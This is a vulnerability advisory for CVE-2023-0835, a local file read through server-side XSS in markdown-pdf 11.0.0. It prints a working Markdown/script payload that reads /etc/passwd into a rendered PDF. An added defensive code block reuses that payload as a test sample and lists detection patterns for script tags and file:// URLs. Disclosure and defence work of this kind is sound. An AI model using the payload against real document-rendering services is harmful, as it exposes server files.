CVE-2023-0835: markdown-pdf 11.0.0 - Local File Read via Server Side XSS | Advisories | Fluid Attacks

Summary

Name: markdown-pdf 11.0.0 - Local File Read
Code name: RelsB
Product: markdown-pdf
Affected versions: Version 11.0.0
State: Public
Release date: 2023-04-10

Vulnerability

Kind: Server Side XSS
Rule: 425. Server Side XSS
Remote: Yes
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSSv3 Base Score: 7.5
Exploit available: Yes
CVE ID(s): CVE-2023-0835

Description

markdown-pdf version 11.0.0 allows an external attacker to remotely obtain arbitrary local files. This is possible because the application does not validate the Markdown content entered by the user.

Vulnerability

This vulnerability occurs because the application does not validate the Markdown content entered by the user, so malicious content is not rejected before rendering.

Exploitation

To exploit this vulnerability, we only need to send the following malicious Markdown to markdown-pdf:

Exploit.md

<script>
    // Path Disclosure
    document.write(window.location);
    // Arbitrary Local File Read
    var xhr = new XMLHttpRequest();
    xhr.onload = function () { document.write(this.responseText); };
    xhr.open("GET", "file:///etc/passwd");
    xhr.send();
</script>

Thus, when markdown-pdf renders the malicious Markdown, the generated PDF contains the contents of the specified local file.
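The root cause described above (untrusted Markdown reaching a browser-based PDF renderer that can load file:// URLs) calls for a gate in front of the renderer. The following is an added example, not code from the advisory or from the markdown-pdf project; the function names and the benign sample document are constructed here, and the advisory's Exploit.md is reused as the malicious sample.

```javascript
// Added example, not code from the advisory or from markdown-pdf: a pre-render gate
// for a Markdown-to-PDF pipeline. Two defensive steps are shown:
//   1. detectActiveContent(): flags raw HTML that would execute in the renderer
//      (script tags, inline event handlers, javascript:/file: URLs, frames/objects),
//      useful for alerting and for rejecting the document outright;
//   2. neutralizeRawHtml(): escapes '<' outside code spans/fences so any raw HTML is
//      rendered as literal text rather than interpreted. This is the step that
//      actually prevents execution; the patterns are a tripwire, not a sanitizer.
// Trade-off of step 2: Markdown autolinks written as <https://...> become literal text.

const ACTIVE_CONTENT_PATTERNS = [
  { name: 'script tag',            re: /<\s*script\b/i },
  { name: 'inline event handler',  re: /<[^>]*\son\w+\s*=/i },
  { name: 'javascript: URL',       re: /javascript\s*:/i },
  { name: 'local file URL',        re: /file\s*:\/\//i },
  { name: 'embedded frame/object', re: /<\s*(iframe|object|embed)\b/i },
];

function detectActiveContent(markdown) {
  return ACTIVE_CONTENT_PATTERNS.filter((p) => p.re.test(markdown)).map((p) => p.name);
}

// Split on fenced blocks and inline code spans (odd indices after the split) and
// escape '<' only in the prose chunks; code chunks are already emitted as literal text.
function neutralizeRawHtml(markdown) {
  return markdown
    .split(/(```[\s\S]*?```|`[^`\n]*`)/)
    .map((chunk, i) => (i % 2 === 1 ? chunk : chunk.replace(/</g, '&lt;')))
    .join('');
}

// Policy wrapper: documents carrying active content are rejected and the findings
// returned for logging; everything else is neutralized before it reaches the renderer.
function gateMarkdown(markdown) {
  const findings = detectActiveContent(markdown);
  if (findings.length > 0) return { accepted: false, findings, markdown: null };
  return { accepted: true, findings, markdown: neutralizeRawHtml(markdown) };
}

// Sample input: the Exploit.md from the advisory, and a constructed benign document.
const EXPLOIT_MD = `<script>
    document.write(window.location);
    xhr = new XMLHttpRequest;
    xhr.onload=function(){document.write((this.responseText))};
    xhr.open("GET","file:///etc/passwd");
    xhr.send();
</script>`;
const BENIGN_MD = '# Release notes\n\nSee the [docs](https://example.invalid) and `<b>` in code.\n\n> quoted';

console.log(gateMarkdown(EXPLOIT_MD), gateMarkdown(BENIGN_MD));
```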

Evidence of exploitation

Our security policy

We have reserved the ID CVE-2023-0835 to refer to this issue from now on.

  • https://fluidattacks.com/advisories/policy/

System Information

  • Version: electron-pdf 11.0.0

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks’ Offensive Team.

References

Vendor page: https://www.npmjs.com/package/markdown-pdf/

Timeline

2023-02-20: Vulnerability discovered.
2023-02-20: Vendor contacted.
2023-02-20: Vendor replied acknowledging the report.
2023-04-10: Public Disclosure.

Related news

GHSA-qghr-877h-f9jh: markdown-pdf vulnerable to local file read via server side cross-site scripting (XSS)
